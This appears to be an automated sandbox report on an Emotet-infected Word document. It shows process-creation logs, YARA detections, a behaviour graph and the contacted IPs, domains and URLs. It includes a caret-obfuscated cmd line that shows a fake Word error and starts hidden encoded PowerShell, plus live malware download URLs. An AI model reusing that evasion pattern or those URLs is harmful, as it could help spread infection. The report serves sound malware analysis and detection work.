Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000016.00000002.2368006651.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2369643612.0000000000180000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342398831.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339483010.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335393724.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352976974.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2363852482.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2370162675.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2333967935.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342378229.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2334066475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2485894589.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2368454329.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335519485.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351415450.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2358322887.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2370274121.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2486292831.0000000002010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355550940.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343974004.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2368531156.0000000000450000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360129710.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338149952.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343885574.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338282736.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2359551824.0000000000460000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2364687136.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355569966.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352906309.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351067576.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2333875086.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2355670534.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2342497051.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2367980145.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2338123179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2335352749.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339586653.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330883211.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2339441337.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2485863461.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2347031079.0000000000280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348536550.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360111276.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2358696763.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2360228021.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2352930564.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2351291099.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348563781.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2343843229.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2348503069.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.930000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.6b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.550000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.2010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.2010000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.450000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.460000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.280000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.280000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.550000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
Behavior Graph (ID: 343979, Sample: N00048481397007.doc, Startdate: 25/01/2021, Architecture: WINDOWS, Score: 100)

Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet. IP-count shading: No. of IPs < 25%, 25% to 50%, 50% to 75%, > 75%.

Graph contents (recovered from the rendered graph):

  • Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 11 other signatures.
  • WINWORD.EXE started; cmd.exe started (signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found).
  • cmd.exe started powershell.exe and msg.exe.
  • powershell.exe contacted traumfrauen-ukraine.de (212.227.200.73, port 443; ONEANDONE-ASBrauerstrasse48DE, Germany) and nightlifemumbai.club (172.217.6.174, port 80; GOOGLEUS, United States) plus 3 other IPs or domains, dropped C:\Users\user\Lxbfyvkbehaviorgraphcqtr_f\C46T.dll (PE32; signature: Powershell drops PE file), and started rundll32.exe.
  • msg.exe started rundll32.exe.
  • Both rundll32.exe instances started further chains of rundll32.exe child processes; along these chains the signature "Hides that the sample has been downloaded from the Internet (zone.identifier)" was raised repeatedly.

Contacted Public IPs

IP               Domain   Country        ASN    ASN Name                        Malicious
104.21.88.166    unknown  United States  13335  CLOUDFLARENETUS                 true
192.0.78.20      unknown  United States  2635   AUTOMATTICUS                    true
212.227.200.73   unknown  Germany        8560   ONEANDONE-ASBrauerstrasse48DE   true
172.217.6.174    unknown  United States  15169  GOOGLEUS                        true
190.55.186.229   unknown  Argentina      27747  TelecentroSAAR                  true

Contacted Domains

Name                       IP              Active
shop.nowfal.dev            104.21.88.166   true
traumfrauen-ukraine.de     212.227.200.73  true
nightlifemumbai.club       172.217.6.174   true
jflmktg.wpcomstaging.com   192.0.78.20     true
e-wdesign.eu               unknown         unknown

Contacted URLs

Name                                     Malicious  Antivirus Detection       Reputation
http://nightlifemumbai.club/x/0wBD3/     true       Avira URL Cloud: malware  unknown
http://traumfrauen-ukraine.de/bin/JyeS/  true       Avira URL Cloud: safe     unknown
http://190.55.186.229/pvaadnb3/          true       Avira URL Cloud: safe     unknown